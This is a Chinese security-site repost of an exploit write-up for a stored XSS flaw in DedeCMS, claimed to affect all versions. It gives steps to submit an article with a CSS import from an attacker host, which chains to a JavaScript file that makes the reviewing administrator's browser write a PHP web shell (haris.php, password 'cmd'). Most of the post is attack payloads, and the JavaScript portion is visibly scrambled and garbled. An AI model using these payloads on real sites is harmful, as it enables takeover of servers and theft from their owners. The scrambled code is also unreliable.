Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

dedecms xss oday通杀所有版本

来源: 未知 分享至:

dedecms xss oday通杀所有版本(T00ls首发) by haris

作者:haris

漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell

目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
 

下面说说利用方法。
条件有2个:
1.开启注册
2.开启投稿

注册会员----发表文章

内容填写:

<STYLE>@im\port
'\http://xxx.com/xss.css'
;</STYLE>

新建XSS.Css

body{ 

2 background-image:url(
'javascript:document.write("<SCRIPT src="http://xxx.com/xss.js"></SCRIPT>")'

}

新建xss.js 内容为

var request = false;

02 if(window.XMLHttpRequest) {
03 request = new XMLHttpRequest();
04 if(request.overrideMimeType) {
05 request.overrideMimeType('text/xml');
06 }
07 } else if(window.ActiveXObject) {
08 var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
09 for(var i=0; i<VERSIONS.LENGTH; pre < } xmlhttp.send(params); ?Keep-Alive?); xmlhttp.setRequestHeader(?Connection?, params.length); xmlhttp.setRequestHeader(?Content-length?, x-www-form-urlencoded?); ?application xmlhttp.setRequestHeader(?Content-type?, true); url, xmlhttp.open(?POST?, ; params="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++" var sys_sql_query.php?; +u+? url add_admin(){ function add_admin(); u="getFolder(oUrl);" oUrl="top.location.href;" obj[obj.length-2] return obj="url.split('/')" ){ getFolder( xmlhttp="request;" {} catch(e) ActiveXObject(versions[i]); request="new" { try i++)>
10 <P>当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd</P>

Tags: du du命令 linux du命令 dir 详细
分享至:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史